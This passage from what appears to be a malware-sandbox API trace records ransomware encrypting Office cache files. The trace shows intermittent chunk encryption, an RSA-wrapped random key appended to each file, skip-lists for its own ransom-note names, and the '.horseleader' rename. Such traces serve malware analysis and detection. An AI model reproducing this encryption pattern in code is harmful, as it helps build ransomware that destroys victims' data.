liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.700] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.700] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x2288f5c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.700] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.795] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0219.795] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0219.795] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.795] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0219.795] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0219.796] CloseHandle (hObject=0x21c) returned 1 [0219.796] GetProcessHeap () returned 0x780000 [0219.796] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0219.796] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.horseleader") returned 91 [0219.796] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\owow32ww.cab.horseleader")) returned 1 [0219.797] GetProcessHeap () returned 0x780000 [0219.797] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0219.797] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7bd91af0, ftCreationTime.dwHighDateTime=0x1cb07b2, ftLastAccessTime.dwLowDateTime=0x7bd91af0, ftLastAccessTime.dwHighDateTime=0x1cb07b2, ftLastWriteTime.dwLowDateTime=0xa8bafbc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x165510, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="PidGenX.dll", cAlternateFileName="")) returned 1 [0219.797] lstrcmpiW (lpString1="PidGenX.dll", lpString2="Windows") returned -1 [0219.797] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0219.797] StrStrIW (lpFirst="PidGenX.dll", lpSrch=".horseleader") returned 0x0 [0219.797] lstrcmpW (lpString1="PidGenX.dll", lpString2="#Decrypt#.txt") returned 1 [0219.797] lstrcmpW (lpString1="PidGenX.dll", lpString2="_uninstalling_.png") returned 1 [0219.797] lstrlenW (lpString=".testttjffg") returned 11 [0219.797] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll", lpSrch=".testttjffg") returned 0x0 [0219.797] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0219.797] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0219.797] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0219.798] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll") returned 78 [0219.798] StrStrW (lpFirst="PidGenX.dll", lpSrch=".txt") returned 0x0 [0219.798] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1463568) returned 1 [0219.798] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0219.798] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0220.133] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0220.133] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0220.155] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xb0288, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0220.176] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0220.442] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0220.442] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0220.443] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x160510, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0220.443] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0220.461] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0220.461] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0220.462] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0220.462] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0220.462] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0220.462] CloseHandle (hObject=0x21c) returned 1 [0220.462] GetProcessHeap () returned 0x780000 [0220.462] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0220.462] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.horseleader") returned 90 [0220.462] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PidGenX.dll.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pidgenx.dll.horseleader")) returned 1 [0220.467] GetProcessHeap () returned 0x780000 [0220.467] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0220.467] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2a2397e0, ftCreationTime.dwHighDateTime=0x1cbe19a, ftLastAccessTime.dwLowDateTime=0x2a2397e0, ftLastAccessTime.dwHighDateTime=0x1cbe19a, ftLastWriteTime.dwLowDateTime=0xa8bafbc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0xaec3a, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="pkeyconfig-office.xrm-ms", cAlternateFileName="PKEYCO~1.XRM")) returned 1 [0220.467] lstrcmpiW (lpString1="pkeyconfig-office.xrm-ms", lpString2="Windows") returned -1 [0220.471] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0220.471] StrStrIW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".horseleader") returned 0x0 [0220.471] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2="#Decrypt#.txt") returned 1 [0220.471] lstrcmpW (lpString1="pkeyconfig-office.xrm-ms", lpString2="_uninstalling_.png") returned 1 [0220.471] lstrlenW (lpString=".testttjffg") returned 11 [0220.471] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms", lpSrch=".testttjffg") returned 0x0 [0220.471] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0220.471] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0220.471] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0220.474] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms") returned 91 [0220.474] StrStrW (lpFirst="pkeyconfig-office.xrm-ms", lpSrch=".txt") returned 0x0 [0220.474] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=715834) returned 1 [0220.474] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0220.474] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0220.522] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0220.523] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0220.523] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x54e1d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0220.523] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0220.929] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0220.929] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0220.929] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xa9c3a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0220.929] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0220.940] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0220.940] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0220.940] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0220.940] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0220.941] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0220.941] CloseHandle (hObject=0x21c) returned 1 [0220.941] GetProcessHeap () returned 0x780000 [0220.941] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0220.941] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.horseleader") returned 103 [0220.941] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\pkeyconfig-office.xrm-ms.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\pkeyconfig-office.xrm-ms.horseleader")) returned 1 [0220.942] GetProcessHeap () returned 0x780000 [0220.942] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0220.942] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7c1614f0, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7c1614f0, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa60fd8f0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0xa4c400, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="PrjProrWW.msi", cAlternateFileName="PRJPRO~1.MSI")) returned 1 [0220.942] lstrcmpiW (lpString1="PrjProrWW.msi", lpString2="Windows") returned -1 [0220.942] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 80 [0220.942] StrStrIW (lpFirst="PrjProrWW.msi", lpSrch=".horseleader") returned 0x0 [0220.942] lstrcmpW (lpString1="PrjProrWW.msi", lpString2="#Decrypt#.txt") returned 1 [0220.942] lstrcmpW (lpString1="PrjProrWW.msi", lpString2="_uninstalling_.png") returned 1 [0220.942] lstrlenW (lpString=".testttjffg") returned 11 [0220.942] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi", lpSrch=".testttjffg") returned 0x0 [0220.942] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0220.942] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0220.942] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0220.943] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi") returned 80 [0220.943] StrStrW (lpFirst="PrjProrWW.msi", lpSrch=".txt") returned 0x0 [0220.943] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=10798080) returned 1 [0220.944] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0220.944] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0220.963] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0220.963] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0220.964] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x523a00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0220.964] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0221.001] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0221.001] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0221.001] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xa47400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0221.001] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0221.264] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0221.264] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0221.264] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0221.264] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0221.264] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0221.264] CloseHandle (hObject=0x21c) returned 1 [0221.265] GetProcessHeap () returned 0x780000 [0221.265] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0221.265] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.horseleader") returned 92 [0221.265] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.msi.horseleader" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.msi.horseleader")) returned 1 [0221.266] GetProcessHeap () returned 0x780000 [0221.266] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0221.266] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cabec50, ftCreationTime.dwHighDateTime=0x1cb148c, ftLastAccessTime.dwLowDateTime=0x7cabec50, ftLastAccessTime.dwHighDateTime=0x1cb148c, ftLastWriteTime.dwLowDateTime=0xa60fd8f0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x1915, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="PrjProrWW.xml", cAlternateFileName="PRJPRO~1.XML")) returned 1 [0221.266] lstrcmpiW (lpString1="PrjProrWW.xml", lpString2="Windows") returned -1 [0221.266] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 80 [0221.266] StrStrIW (lpFirst="PrjProrWW.xml", lpSrch=".horseleader") returned 0x0 [0221.266] lstrcmpW (lpString1="PrjProrWW.xml", lpString2="#Decrypt#.txt") returned 1 [0221.266] lstrcmpW (lpString1="PrjProrWW.xml", lpString2="_uninstalling_.png") returned 1 [0221.266] lstrlenW (lpString=".testttjffg") returned 11 [0221.266] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml", lpSrch=".testttjffg") returned 0x0 [0221.266] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0221.266] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0221.267] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml" (normalized: "c:\\msocache\\all users\\{91140000-003b-0000-1000-0000000ff1ce}-c\\prjprorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0221.268] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\PrjProrWW.xml") returned 80 [0221.268] StrStrW (lpFirst="PrjProrWW.xml", lpSrch=".txt") returned 0x0 [0221.268] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=6421) returned 1 [0221.268] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x1915, lpOverlapped=0x0) returned 1 [0221.272] 